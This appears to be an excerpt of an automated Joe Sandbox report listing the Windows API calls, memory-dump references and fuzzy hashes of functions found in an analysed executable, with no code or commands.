ScreenToClient.USER32(?,?), ref: 007292C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007292D3
EndPaint.USER32(?,?,?,?,?), ref: 00729321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007671EA

Part of subcall function 00729339: BeginPath.GDI32(00000000), ref: 00729357

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 8d77930e50d72ed3c1834ea5057273e897f5fdecc51344a90917529feb8c9b5c
Instruction ID: d9877d1b4fdb6510af0a0610396975b7c1777886fa3b864099af432ffed39cb9
Opcode Fuzzy Hash: 8d77930e50d72ed3c1834ea5057273e897f5fdecc51344a90917529feb8c9b5c
Instruction Fuzzy Hash: A841D270105250EFD711DF24DC85FBA7BF8EB8A364F184229FA558B2A2C738A845DB61

Function 007807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0078080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00780847
EnterCriticalSection.KERNEL32(?), ref: 00780863
LeaveCriticalSection.KERNEL32(?), ref: 007808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00780921

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 85e6809665e191ddd7f471cfbb7a717050f5d47cd14b89acc75469d385de52aa
Instruction ID: d4124d6d6eaa41f4709f2958efed107cfa10137ba232306d6a230d0ad6589633
Opcode Fuzzy Hash: 85e6809665e191ddd7f471cfbb7a717050f5d47cd14b89acc75469d385de52aa
Instruction Fuzzy Hash: A3418D71A00205EFDF15AF54DC85AAA7778FF44310F1480B9ED00AA297DB38EE65DBA4

Function 007A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0076F3AB,00000000,?,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 007A824C
EnableWindow.USER32(00000000,00000000), ref: 007A8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007A82D1
ShowWindow.USER32(00000000,00000004), ref: 007A82E5
EnableWindow.USER32(00000000,00000001), ref: 007A830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007A832F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 449ac696c46614cd7a3a9dcd69792935650a4b90bae45384b675f0f2a6200cdf
Instruction ID: 1a61f3781e4aa8a6525ebfa625d660b535f0d0f268c456ecb0d35135aff55593
Opcode Fuzzy Hash: 449ac696c46614cd7a3a9dcd69792935650a4b90bae45384b675f0f2a6200cdf
Instruction Fuzzy Hash: 8041A630601684EFDF55CF14D899BA47BE0FB8B714F1842A5E6484F2A2CB396841CF56

Function 00774C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00774C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00774CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00774CEA
_wcslen.LIBCMT ref: 00774D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00774D10
_wcsstr.LIBVCRUNTIME ref: 00774D1A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 84f5af59753513076653e1835788a60b981d29dd503a95a7295f21af6f7ee46b
Instruction ID: 5f0027283bbee1c28cb1fcf7fcf94576a4574ff501fa988369f73cb72357ea09
Opcode Fuzzy Hash: 84f5af59753513076653e1835788a60b981d29dd503a95a7295f21af6f7ee46b
Instruction Fuzzy Hash: 3321FC31704210BBEF269B39AC49E7B7BACDF46790F10C079F909CA152EF69DC0196A0

Function 0078581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2

_wcslen.LIBCMT ref: 0078587B
CoInitialize.OLE32(00000000), ref: 00785995
CoCreateInstance.OLE32(007AFCF8,00000000,00000001,007AFB68,?), ref: 007859AE
CoUninitialize.OLE32 ref: 007859CC

Strings

.lnk, xrefs: 00785876, 007858C1, 00785985

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: f9485ed47985ed062a0fa549f9876482bca39d04c0e813234eb46eed9f8eaddf
Instruction ID: f8a96ac652b3e176f9f853fad41bec5c444adacae372b3beb4e22e432c6b2ebb
Opcode Fuzzy Hash: f9485ed47985ed062a0fa549f9876482bca39d04c0e813234eb46eed9f8eaddf
Instruction Fuzzy Hash: CAD164B1604600DFC714EF28C48496ABBF2FF89710F148859F8899B361DB39EC45CB92

Function 0077175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00770FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00770FCA
Part of subcall function 00770FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00770FD6
Part of subcall function 00770FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00770FE5
Part of subcall function 00770FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00770FEC
Part of subcall function 00770FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00771002

GetLengthSid.ADVAPI32(?,00000000,00771335), ref: 007717AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007717BA
HeapAlloc.KERNEL32(00000000), ref: 007717C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 007717DA
GetProcessHeap.KERNEL32(00000000,00000000,00771335), ref: 007717EE
HeapFree.KERNEL32(00000000), ref: 007717F5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: d3b02d56c4187fc380885b36928dc8575edbbb08a98201ff1ee6d5f004ec8cf1
Instruction ID: 8ed5e9991a0465e5a934a10b3af634b5a47f608cb001feade70c71aea4b97aae
Opcode Fuzzy Hash: d3b02d56c4187fc380885b36928dc8575edbbb08a98201ff1ee6d5f004ec8cf1
Instruction Fuzzy Hash: 55117C71600209FFDF199FA8CC49BAF7BA9EB86395F50C018F44597210D739A944CFA0

Function 007714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007714FF
OpenProcessToken.ADVAPI32(00000000), ref: 00771506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00771515
CloseHandle.KERNEL32(00000004), ref: 00771520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0077154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00771563

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 6748936c245cea50d734746a489ac87a9c3e8a1344bd80e221dd226d660851b8
Instruction ID: 5b381dcc736f60cc94a0fd1a315759107b45225552f6b37422945c5c586b3ad5
Opcode Fuzzy Hash: 6748936c245cea50d734746a489ac87a9c3e8a1344bd80e221dd226d660851b8
Instruction Fuzzy Hash: AF113A7250024DBBDF128F98DD49FDE7BA9EF89744F048055FA09A2160C379CE64DB61

Function 00733382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00733379,00732FE5), ref: 00733390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0073339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007333B7
SetLastError.KERNEL32(00000000,?,00733379,00732FE5), ref: 00733409

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1cb878e9541a7748a5e2687d32209911190f9a22681509b93f1b84d8ff306b65
Instruction ID: a511d4771ce9f10f6cfae09293ef845fac0fef325e1fe403ed703c08272bfe34
Opcode Fuzzy Hash: 1cb878e9541a7748a5e2687d32209911190f9a22681509b93f1b84d8ff306b65
Instruction Fuzzy Hash: D001F73360E312FEBA3627757C8A6676BA4EB05379F20C22AF410852F3EF1D4D019548

Function 00742D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00745686,00753CD6,?,00000000,?,00745B6A,?,?,?,?,?,0073E6D1,?,007D8A48), ref: 00742D78
_free.LIBCMT ref: 00742DAB
_free.LIBCMT ref: 00742DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0073E6D1,?,007D8A48,00000010,00714F4A,?,?,00000000,00753CD6), ref: 00742DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0073E6D1,?,007D8A48,00000010,00714F4A,?,?,00000000,00753CD6), ref: 00742DEC
_abort.LIBCMT ref: 00742DF2

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 7a9b99ff6b36a3e66fa9f31e3dba58e66db0b8578298f5553c8cfa8f4ea0ab02
Instruction ID: 96582149e7a18aa565d2bd9d77c745bc56a14802e904a7250713dd578122b68a
Opcode Fuzzy Hash: 7a9b99ff6b36a3e66fa9f31e3dba58e66db0b8578298f5553c8cfa8f4ea0ab02
Instruction Fuzzy Hash: 79F0A431A05A01B7C6176735AC0EB1A2669AFC27A1B644419F824921A3EF6C98235961

Function 007A8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00729639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296A2
Part of subcall function 00729639: BeginPath.GDI32(?), ref: 007296B9
Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007A8A4E
LineTo.GDI32(?,00000003,00000000), ref: 007A8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007A8A70
LineTo.GDI32(?,00000000,00000003), ref: 007A8A80
EndPath.GDI32(?), ref: 007A8A90
StrokePath.GDI32(?), ref: 007A8AA0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: f189f7e5377d671cdcd34bcb2df62b6c4fbd0e0e5763f17844bded78397a432d
Instruction ID: 4f4340b4b2601cdd0fea9a7bc33a75edba9c1d00a44da350c2eb9aff0ba56d33
Opcode Fuzzy Hash: f189f7e5377d671cdcd34bcb2df62b6c4fbd0e0e5763f17844bded78397a432d
Instruction Fuzzy Hash: CB11057600014CFFEB129F90DC88EAA7FACEB09350F04C022BA199A1A1C775AD55DBA4

Function 007751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00775218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00775229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00775230
ReleaseDC.USER32(00000000,00000000), ref: 00775238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0077524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00775261

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b3e319468c20a5904b1dcba83accac3ccb0fe2764d29e547bcc09d44900790ff
Instruction ID: 9d16cef0de00a27920edc8651dfc34e6fd2cbf97a01d1a1cc0abf62477e07d94
Opcode Fuzzy Hash: b3e319468c20a5904b1dcba83accac3ccb0fe2764d29e547bcc09d44900790ff
Instruction Fuzzy Hash: A9018FB5A00708BBEF119BA59C49A4EBFB8FB89351F048065FA04A7281D6749C00CBA4

Function 00711BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00711BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00711C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00711C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00711C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00711C22

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: fc642aee033f1221e76e13a64784fe0779d9a835314785496a78a6f3dfd8d76a
Instruction ID: a20a0c87b58452d5c1ddddab5f1d37eb41ec8c55d5821e473e5ae642fe3e6d68
Opcode Fuzzy Hash: fc642aee033f1221e76e13a64784fe0779d9a835314785496a78a6f3dfd8d76a
Instruction Fuzzy Hash: 9B0167B0902B5ABDE3008F6A8C85B52FFE8FF59354F04415BA15C4BA42C7F5A864CBE5

Function 0077EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0077EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0077EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0077EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0077EB75

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0d377c04bfc5174237b0e949df107f1c5106daff4dce21238caee43cc5929a47
Instruction ID: 0f139b76699644a87a5f3d4eddf8348181555bf9412fe73629aba430720de79f
Opcode Fuzzy Hash: 0d377c04bfc5174237b0e949df107f1c5106daff4dce21238caee43cc5929a47
Instruction Fuzzy Hash: 99F054B2240158BBE7225B52DC0EEEF3E7CEFCBB11F008159F601D1091DBA85A01C6B9

Function 00767439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00767452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00767469
GetWindowDC.USER32(?), ref: 00767475
GetPixel.GDI32(00000000,?,?), ref: 00767484
ReleaseDC.USER32(?,00000000), ref: 00767496
GetSysColor.USER32(00000005), ref: 007674B0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 955d9d2d1692ecae10325e30531b312c775556a2193b78c03b514b7309e399df
Instruction ID: 3d61583e9d91f65e67d43268180fb97b0f65bd871d68cb52166a922b7edf9fa1
Opcode Fuzzy Hash: 955d9d2d1692ecae10325e30531b312c775556a2193b78c03b514b7309e399df
Instruction Fuzzy Hash: 26018B31400215FFDB129FA4DD08BAA7FB5FB45311F648060FD16A61A0CF391E51EB54

Function 00771874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0077187F
UnloadUserProfile.USERENV(?,?), ref: 0077188B
CloseHandle.KERNEL32(?), ref: 00771894
CloseHandle.KERNEL32(?), ref: 0077189C
GetProcessHeap.KERNEL32(00000000,?), ref: 007718A5
HeapFree.KERNEL32(00000000), ref: 007718AC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: ff7577a8d729257f1c7764fb8715b9552954c501a4919a72a8ba55212f0f0376
Instruction ID: b726b52f8103410e8cfcbcff62722f60089ad6ea9eb3f69ca9adda4f899ceca5
Opcode Fuzzy Hash: ff7577a8d729257f1c7764fb8715b9552954c501a4919a72a8ba55212f0f0376
Instruction Fuzzy Hash: C7E0E576204105BBDB025FA1ED0C90ABF79FF8AB22B10C220F22581070CB369821DF5A

Function 0071BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0071BEB3

Strings

D%~, xrefs: 0071BCA2
D%~D%~, xrefs: 0071BCA5
D%~, xrefs: 0071BE9A
D%~, xrefs: 0071BDED, 0071BD91, 0071BD1B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%~$D%~$D%~$D%~D%~
API String ID: 1385522511-534703835
Opcode ID: 1343a3f6fbcd1d376515c2c935e1da7bb02243d77fcaf1ce119dfffed9facd63
Instruction ID: 0bde99fd833bef1f27ec1452ea331335c1f37e5bb5b901c50471117c5d4c6e54
Opcode Fuzzy Hash: 1343a3f6fbcd1d376515c2c935e1da7bb02243d77fcaf1ce119dfffed9facd63
Instruction Fuzzy Hash: 55911775A0020ADFCB18CF5DC0916EAB7F1FF58310F248169D985AB391E779A981CBE0

Function 00797B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00730242: EnterCriticalSection.KERNEL32(007E070C,007E1884,?,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073024D
Part of subcall function 00730242: LeaveCriticalSection.KERNEL32(007E070C,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073028A

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9

